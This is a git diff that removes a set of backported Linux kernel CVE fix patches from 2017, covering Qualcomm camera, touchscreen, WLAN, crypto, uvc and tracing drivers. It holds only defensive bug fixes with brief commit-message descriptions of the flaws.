-From: Rajesh Bondugula
-Date: Mon, 4 May 2015 12:05:20 -0700
-Subject: msm: camera: sensor: Fix the improper pointer dereference
-
-Pass flash_ctrl to msm_torch_create_classdev
-instead of &flash_ctrl.
-This change will fix the improper pointer
-dereference issue. msm_torch_create_classdev needs
-flash_ctrl pointer to retrieve torch informaiton.
-
-Change-Id: I05bf130b2161336e93122d7e918a4c48a6b381e2
-Signed-off-by: Rajesh Bondugula
----
- drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 864bf63..0faec90 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -1192,7 +1192,7 @@ static int32_t msm_flash_platform_probe(struct platform_device *pdev)
- flash_ctrl->msm_sd.sd.devnode->fops = &msm_flash_v4l2_subdev_fops;
-
- if (flash_ctrl->flash_driver_type == FLASH_DRIVER_PMIC)
-- rc = msm_torch_create_classdev(pdev, &flash_ctrl);
-+ rc = msm_torch_create_classdev(pdev, flash_ctrl);
-
- CDBG("probe success\n");
- return rc;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch
deleted file mode 100644
index b9a3fed4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0622/3.18/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 40efa25345003a96db34effbd23ed39530b3ac10 Mon Sep 17 00:00:00 2001
-From: Vevek Venkatesan
-Date: Mon, 23 Jan 2017 18:04:53 +0530
-Subject: input: touchscreen: gt9xx: fix memory corruption in Goodix driver
-
-Fix memory corruption in Goodix touchscreen driver, by resetting
-the global structure cmd_head to zero (except *data and wr flag)
-in goodix_tool_write handler on error case.
-
-Change-Id: I4f7f8f464b93571627b922b10c10a65826228e42
-Signed-off-by: Vevek Venkatesan
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index 762efc9..7ca154a 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-@@ -1,7 +1,7 @@
- /* drivers/input/touchscreen/goodix_tool.c
- *
- * 2010 - 2012 Goodix Technology.
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
-@@ -309,6 +309,7 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- size_t count, loff_t *ppos)
- {
- s32 ret = 0;
-+ u8 *dataptr = NULL;
-
- mutex_lock(&lock);
- ret = copy_from_user(&cmd_head, userbuf, CMD_HEAD_LENGTH);
-@@ -468,6 +469,11 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- ret = CMD_HEAD_LENGTH;
-
- exit:
-+ dataptr = cmd_head.data;
-+ memset(&cmd_head, 0, sizeof(cmd_head));
-+ cmd_head.wr = 0xFF;
-+ cmd_head.data = dataptr;
-+
- mutex_unlock(&lock);
- return ret;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch
deleted file mode 100644
index 8848c1d7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0622/4.4/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 2881d2bbc26ff321fd9e717ad6f968aebd277d22 Mon Sep 17 00:00:00 2001
-From: Vevek Venkatesan
-Date: Mon, 23 Jan 2017 18:04:53 +0530
-Subject: input: touchscreen: gt9xx: fix memory corruption in Goodix driver
-
-Fix memory corruption in Goodix touchscreen driver, by resetting
-the global structure cmd_head to zero (except *data and wr flag)
-in goodix_tool_write handler on error case.
-
-Change-Id: I4f7f8f464b93571627b922b10c10a65826228e42
-Signed-off-by: Vevek Venkatesan
----
- drivers/input/touchscreen/gt9xx/goodix_tool.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/gt9xx/goodix_tool.c b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-index 1657f56..ded8c88 100644
---- a/drivers/input/touchscreen/gt9xx/goodix_tool.c
-+++ b/drivers/input/touchscreen/gt9xx/goodix_tool.c
-@@ -1,7 +1,7 @@
- /* drivers/input/touchscreen/goodix_tool.c
- *
- * 2010 - 2012 Goodix Technology.
-- * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
-@@ -308,6 +308,7 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- size_t count, loff_t *ppos)
- {
- s32 ret = 0;
-+ u8 *dataptr = NULL;
-
- mutex_lock(&lock);
- ret = copy_from_user(&cmd_head, userbuf, CMD_HEAD_LENGTH);
-@@ -463,6 +464,11 @@ static ssize_t goodix_tool_write(struct file *filp, const char __user *userbuf,
- ret = CMD_HEAD_LENGTH;
-
- exit:
-+ dataptr = cmd_head.data;
-+ memset(&cmd_head, 0, sizeof(cmd_head));
-+ cmd_head.wr = 0xFF;
-+ cmd_head.data = dataptr;
-+
- mutex_unlock(&lock);
- return ret;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch
deleted file mode 100644
index 40c87b93..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0624/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@ -From 0ac5f6f2f221efb93fc0ddb1fec6487c76d95acd Mon Sep 17 00:00:00 2001 -From: Srinivas Girigowda -Date: Tue, 14 Feb 2017 19:10:47 -0800 -Subject: qcacld-2.0: Acquire lock to protect hdd_ctx in - hdd_driver_memdump_read() - -Two threads accessing the procfs entry might end up in race condition and -lead to use-after-free for hdd_ctx->driver_dump_mem. - -Hence, acquire a lock to protect hdd_ctx. - -Change-Id: If871f4ceadf650978e16b4a336f688a0dae1c494 -CRs-Fixed: 2005832 ---- - CORE/HDD/src/wlan_hdd_memdump.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/CORE/HDD/src/wlan_hdd_memdump.c b/CORE/HDD/src/wlan_hdd_memdump.c -index 4433107..778ec07 100644 ---- a/CORE/HDD/src/wlan_hdd_memdump.c -+++ b/CORE/HDD/src/wlan_hdd_memdump.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2015-2016 The Linux Foundation. All rights reserved. -+ * Copyright (c) 2015-2017 The Linux Foundation. All rights reserved. - * - * Previously licensed under the ISC license by Qualcomm Atheros, Inc. 
- * -@@ -741,11 +741,14 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf, - if (0 != status) - return -EINVAL; - -+ mutex_lock(&hdd_ctx->memdump_lock); - if (*pos < 0) { -+ mutex_unlock(&hdd_ctx->memdump_lock); - hddLog(LOGE, FL("Invalid start offset for memdump read")); - return -EINVAL; - } else if (!count || (hdd_ctx->driver_dump_size && - (*pos >= hdd_ctx->driver_dump_size))) { -+ mutex_unlock(&hdd_ctx->memdump_lock); - hddLog(LOGE, FL("No more data to copy")); - return 0; - } else if ((*pos == 0) || (hdd_ctx->driver_dump_mem == NULL)) { -@@ -756,6 +759,7 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf, - hdd_ctx->driver_dump_mem = - vos_mem_malloc(DRIVER_MEM_DUMP_SIZE); - if (!hdd_ctx->driver_dump_mem) { -+ mutex_unlock(&hdd_ctx->memdump_lock); - hddLog(LOGE, FL("vos_mem_malloc failed")); - return -ENOMEM; - } -@@ -784,6 +788,7 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf, - - if (copy_to_user(buf, hdd_ctx->driver_dump_mem + *pos, - no_of_bytes_read)) { -+ mutex_unlock(&hdd_ctx->memdump_lock); - hddLog(LOGE, FL("copy to user space failed")); - return -EFAULT; - } -@@ -795,6 +800,8 @@ static ssize_t hdd_driver_memdump_read(struct file *file, char __user *buf, - if (*pos >= hdd_ctx->driver_dump_size) - hdd_driver_mem_cleanup(); - -+ mutex_unlock(&hdd_ctx->memdump_lock); -+ - return no_of_bytes_read; - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch deleted file mode 100644 index 1b33dd65..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0626/ANY/0001.patch +++ /dev/null 
@@ -1,159 +0,0 @@ -From 64551bccab9b5b933757f6256b58f9ca0544f004 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Wed, 9 Nov 2016 16:25:24 -0800 -Subject: msm: crypto: set CLR_CNTXT bit for crypto operations - -HLOS Crypto driver needs to set CLR_CNTXT bit for operations with -legacy software key registers - -Change-Id: Iff482f726d106e99a4006f7077a171da3c7ca9c3 -Signed-off-by: Zhen Kong ---- - drivers/crypto/msm/qce50.c | 47 +++++++++++++++++++++++++--------------------- - 1 file changed, 26 insertions(+), 21 deletions(-) - -diff --git a/drivers/crypto/msm/qce50.c b/drivers/crypto/msm/qce50.c -index 3562de7..a8521fd 100644 ---- a/drivers/crypto/msm/qce50.c -+++ b/drivers/crypto/msm/qce50.c -@@ -1347,7 +1347,8 @@ go_proc: - CRYPTO_CONFIG_REG)); - /* issue go to crypto */ - if (use_hw_key == false) { -- QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -+ QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), - pce_dev->iobase + CRYPTO_GOPROC_REG); - } else { - QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -@@ -1528,7 +1529,8 @@ static int _ce_setup_aead_direct(struct qce_device *pce_dev, - - CRYPTO_CONFIG_REG)); - /* issue go to crypto */ -- QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -+ QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), - pce_dev->iobase + CRYPTO_GOPROC_REG); - /* - * Ensure previous instructions (setting the GO register) -@@ -1847,7 +1849,8 @@ static int _ce_setup_cipher_direct(struct qce_device *pce_dev, - CRYPTO_CONFIG_REG)); - /* issue go to crypto */ - if (use_hw_key == false) { -- QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -+ QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), - pce_dev->iobase + CRYPTO_GOPROC_REG); - } else { - QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -@@ -1935,7 +1938,8 @@ static int _ce_f9_setup_direct(struct 
qce_device *pce_dev, - QCE_WRITE_REG(pce_dev->reg.crypto_cfg_le, (pce_dev->iobase + - CRYPTO_CONFIG_REG)); - /* write go */ -- QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -+ QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), - pce_dev->iobase + CRYPTO_GOPROC_REG); - /* - * Ensure previous instructions (setting the GO register) -@@ -2012,7 +2016,8 @@ static int _ce_f8_setup_direct(struct qce_device *pce_dev, - QCE_WRITE_REG(pce_dev->reg.crypto_cfg_le, (pce_dev->iobase + - CRYPTO_CONFIG_REG)); - /* write go */ -- QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -+ QCE_WRITE_REG(((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), - pce_dev->iobase + CRYPTO_GOPROC_REG); - /* - * Ensure previous instructions (setting the GO register) -@@ -3323,8 +3328,8 @@ static int _setup_cipher_aes_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -3437,8 +3442,8 @@ static int _setup_cipher_des_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -3481,8 +3486,8 @@ static int _setup_cipher_null_cmdlistptrs(struct qce_device *pdev, - NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << 
CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -3659,8 +3664,8 @@ static int _setup_auth_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -3876,8 +3881,8 @@ static int _setup_aead_cmdlistptrs(struct qce_device *pdev, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -4009,8 +4014,8 @@ static int _setup_aead_ccm_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -4095,8 +4100,8 @@ static int _setup_f8_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << 
CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; -@@ -4177,8 +4182,8 @@ static int _setup_f9_cmdlistptrs(struct qce_device *pdev, int cri_index, - pdev->reg.crypto_cfg_le, NULL); - - qce_add_cmd_element(pdev, &ce_vaddr, CRYPTO_GOPROC_REG, -- ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP)), -- &pcl_info->go_proc); -+ ((1 << CRYPTO_GO) | (1 << CRYPTO_RESULTS_DUMP) | -+ (1 << CRYPTO_CLR_CNTXT)), &pcl_info->go_proc); - - pcl_info->size = (uintptr_t)ce_vaddr - (uintptr_t)ce_vaddr_start; - *pvaddr = (unsigned char *) ce_vaddr; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch deleted file mode 100644 index 16dcf793..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0627/ANY/0001.patch +++ /dev/null 
@@ -1,37 +0,0 @@
-From fcca203d8e6aa0ef22fa41d72a06dea393d6d148 Mon Sep 17 00:00:00 2001
-From: Robb Glasser
-Date: Tue, 14 Feb 2017 13:25:46 -0800
-Subject: Prevent heap overflow in uvc driver
-
-The size of uvc_control_mapping is user controlled leading to a
-potential heap overflow in the uvc driver. This adds a check to verify
-the user provided size fits within the bounds of the defined buffer
-size.
-
-Bug: 33300353
-Change-Id: If29c1b396633b6137966a12e38f6fd1841b045bd
-Signed-off-by: Robb Glasser
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 8bc3ec72a02052187397d0de1a7b8bbe7340451c
-Signed-off-by: Dennis Cagle
----
- drivers/media/usb/uvc/uvc_ctrl.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
-index a2f4501..f61d1d7 100644
---- a/drivers/media/usb/uvc/uvc_ctrl.c
-+++ b/drivers/media/usb/uvc/uvc_ctrl.c
-@@ -1939,6 +1939,9 @@ int uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
- if (!found)
- return -ENOENT;
-
-+ if (ctrl->info.size < mapping->size)
-+ return -EINVAL;
-+
- if (mutex_lock_interruptible(&chain->ctrl_mutex))
- return -ERESTARTSYS;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch
deleted file mode 100644
index 2635e7bc..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0628/ANY/0001.patch
+++ /dev/null
@@ -1,56 +0,0 @@ -From 012e37bf91490c5b59ba2ab68a4d214b632b613f Mon Sep 17 00:00:00 2001 -From: Rajesh Bondugula -Date: Tue, 8 Nov 2016 11:52:55 -0800 -Subject: msm: camera: sensor: Validate i2c_frq_mode in msm_cci_get_clk_rates - -i2c_freq_mode in msm_cci_get_clk_rates is populated from userspace. -Validate to make sure it has valid values. If a large number is sent -from userspace to avoid a buffer over read. - -Crs-Fixed: 1086833 -Change-Id: I237f60dca3e3dbad4e6188bf047cf7ec5163d159 -Signed-off-by: Rajesh Bondugula ---- - drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 12 ++++++++++-- - 1 file changed, 10 insertions(+), 2 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -index b1c2382..f113bdc 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -@@ -115,15 +115,16 @@ static int32_t msm_cci_set_clk_param(struct cci_device *cci_dev, - enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master; - enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode; - -- clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; -- - if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) { - pr_err("%s:%d invalid i2c_freq_mode = %d", - __func__, __LINE__, i2c_freq_mode); - return -EINVAL; - } -+ - if (cci_dev->i2c_freq_mode[master] == i2c_freq_mode) - return 0; -+ -+ clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; - if (MASTER_0 == master) { - msm_camera_io_w_mb(clk_params->hw_thigh << 16 | - clk_params->hw_tlow, -@@ -1196,6 +1197,13 @@ static uint32_t *msm_cci_get_clk_rates(struct cci_device *cci_dev, - struct msm_cci_clk_params_t *clk_params = NULL; - enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode; - struct device_node *of_node = cci_dev->pdev->dev.of_node; -+ -+ if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) { -+ 
pr_err("%s:%d invalid i2c_freq_mode %d\n", -+ __func__, __LINE__, i2c_freq_mode); -+ return NULL; -+ } -+ - clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; - cci_clk_src = clk_params->cci_clk_src; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch deleted file mode 100644 index 2635e7bc..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0629/ANY/0001.patch +++ /dev/null 
@@ -1,56 +0,0 @@ -From 012e37bf91490c5b59ba2ab68a4d214b632b613f Mon Sep 17 00:00:00 2001 -From: Rajesh Bondugula -Date: Tue, 8 Nov 2016 11:52:55 -0800 -Subject: msm: camera: sensor: Validate i2c_frq_mode in msm_cci_get_clk_rates - -i2c_freq_mode in msm_cci_get_clk_rates is populated from userspace. -Validate to make sure it has valid values. If a large number is sent -from userspace to avoid a buffer over read. - -Crs-Fixed: 1086833 -Change-Id: I237f60dca3e3dbad4e6188bf047cf7ec5163d159 -Signed-off-by: Rajesh Bondugula ---- - drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 12 ++++++++++-- - 1 file changed, 10 insertions(+), 2 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -index b1c2382..f113bdc 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c -@@ -115,15 +115,16 @@ static int32_t msm_cci_set_clk_param(struct cci_device *cci_dev, - enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master; - enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode; - -- clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; -- - if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) { - pr_err("%s:%d invalid i2c_freq_mode = %d", - __func__, __LINE__, i2c_freq_mode); - return -EINVAL; - } -+ - if (cci_dev->i2c_freq_mode[master] == i2c_freq_mode) - return 0; -+ -+ clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; - if (MASTER_0 == master) { - msm_camera_io_w_mb(clk_params->hw_thigh << 16 | - clk_params->hw_tlow, -@@ -1196,6 +1197,13 @@ static uint32_t *msm_cci_get_clk_rates(struct cci_device *cci_dev, - struct msm_cci_clk_params_t *clk_params = NULL; - enum i2c_freq_mode_t i2c_freq_mode = c_ctrl->cci_info->i2c_freq_mode; - struct device_node *of_node = cci_dev->pdev->dev.of_node; -+ -+ if ((i2c_freq_mode >= I2C_MAX_MODES) || (i2c_freq_mode < 0)) { -+ 
pr_err("%s:%d invalid i2c_freq_mode %d\n", -+ __func__, __LINE__, i2c_freq_mode); -+ return NULL; -+ } -+ - clk_params = &cci_dev->cci_clk_params[i2c_freq_mode]; - cci_clk_src = clk_params->cci_clk_src; - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch deleted file mode 100644 index 58230690..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0001.patch +++ /dev/null 
@@ -1,80 +0,0 @@ -From 28fb06421ab3d9256d32611138306470996cc4c1 Mon Sep 17 00:00:00 2001 -From: "Steven Rostedt (Red Hat)" -Date: Tue, 22 Mar 2016 17:30:58 -0400 -Subject: [PATCH] UPSTREAM: tracing: Fix trace_printk() to print when not using - bprintk() - -The trace_printk() code will allocate extra buffers if the compile detects -that a trace_printk() is used. To do this, the format of the trace_printk() -is saved to the __trace_printk_fmt section, and if that section is bigger -than zero, the buffers are allocated (along with a message that this has -happened). - -If trace_printk() uses a format that is not a constant, and thus something -not guaranteed to be around when the print happens, the compiler optimizes -the fmt out, as it is not used, and the __trace_printk_fmt section is not -filled. This means the kernel will not allocate the special buffers needed -for the trace_printk() and the trace_printk() will not write anything to the -tracing buffer. - -Adding a "__used" to the variable in the __trace_printk_fmt section will -keep it around, even though it is set to NULL. This will keep the string -from being printed in the debugfs/tracing/printk_formats section as it is -not needed. - -Reported-by: Vlastimil Babka -Fixes: 07d777fe8c398 "tracing: Add percpu buffers for trace_printk()" -Cc: stable@vger.kernel.org # v3.5+ -Bug: 34277115 -Signed-off-by: Steven Rostedt -Change-Id: I10ce56caa41c7644d9d290d9ed272a6d156c938c ---- - include/linux/kernel.h | 6 +++--- - kernel/trace/trace_printk.c | 3 +++ - 2 files changed, 6 insertions(+), 3 deletions(-) - -diff --git a/include/linux/kernel.h b/include/linux/kernel.h -index 44d0a02224897..0d1fa1b442209 100644 ---- a/include/linux/kernel.h -+++ b/include/linux/kernel.h -@@ -554,7 +554,7 @@ do { \ - - #define do_trace_printk(fmt, args...) \ - do { \ -- static const char *trace_printk_fmt \ -+ static const char *trace_printk_fmt __used \ - __attribute__((section("__trace_printk_fmt"))) = \ - __builtin_constant_p(fmt) ? 
fmt : NULL; \ - \ -@@ -601,7 +601,7 @@ extern int __trace_puts(unsigned long ip, const char *str, int size); - */ - - #define trace_puts(str) ({ \ -- static const char *trace_printk_fmt \ -+ static const char *trace_printk_fmt __used \ - __attribute__((section("__trace_printk_fmt"))) = \ - __builtin_constant_p(str) ? str : NULL; \ - \ -@@ -621,7 +621,7 @@ extern void trace_dump_stack(int skip); - #define ftrace_vprintk(fmt, vargs) \ - do { \ - if (__builtin_constant_p(fmt)) { \ -- static const char *trace_printk_fmt \ -+ static const char *trace_printk_fmt __used \ - __attribute__((section("__trace_printk_fmt"))) = \ - __builtin_constant_p(fmt) ? fmt : NULL; \ - \ -diff --git a/kernel/trace/trace_printk.c b/kernel/trace/trace_printk.c -index a9077c1b4ad3f..fdb23e84b011b 100644 ---- a/kernel/trace/trace_printk.c -+++ b/kernel/trace/trace_printk.c -@@ -272,6 +272,9 @@ static int t_show(struct seq_file *m, void *v) - const char *str = *fmt; - int i; - -+ if (!*fmt) -+ return 0; -+ - seq_printf(m, "0x%lx : \"", *(unsigned long *)fmt); - - /* diff --git a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch deleted file mode 100644 index 3dc82545..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0630/3.10/0002.patch +++ /dev/null 
@@ -1,27 +0,0 @@
-From 45e5a5e1b85f23843b90f3cddcfc26fa862ff80c Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Fri, 3 Mar 2017 15:40:12 -0800
-Subject: [PATCH] tracing: do not leak kernel addresses
-
-This likely breaks tracing tools like trace-cmd. It logs in the same
-format but now addresses are all 0x0.
-
-Bug: 34277115
-Change-Id: Ifb0d4d2a184bf0d95726de05b1acee0287a375d9
----
- kernel/trace/trace_printk.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/kernel/trace/trace_printk.c b/kernel/trace/trace_printk.c
-index fdb23e84b011b..f423e8d551c0a 100644
---- a/kernel/trace/trace_printk.c
-+++ b/kernel/trace/trace_printk.c
-@@ -275,7 +275,7 @@ static int t_show(struct seq_file *m, void *v)
- if (!*fmt)
- return 0;
-
-- seq_printf(m, "0x%lx : \"", *(unsigned long *)fmt);
-+ seq_printf(m, "0x%lx : \"", 0L);
-
- /*
- * Tabs and new lines need to be converted.
diff --git a/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch
deleted file mode 100644
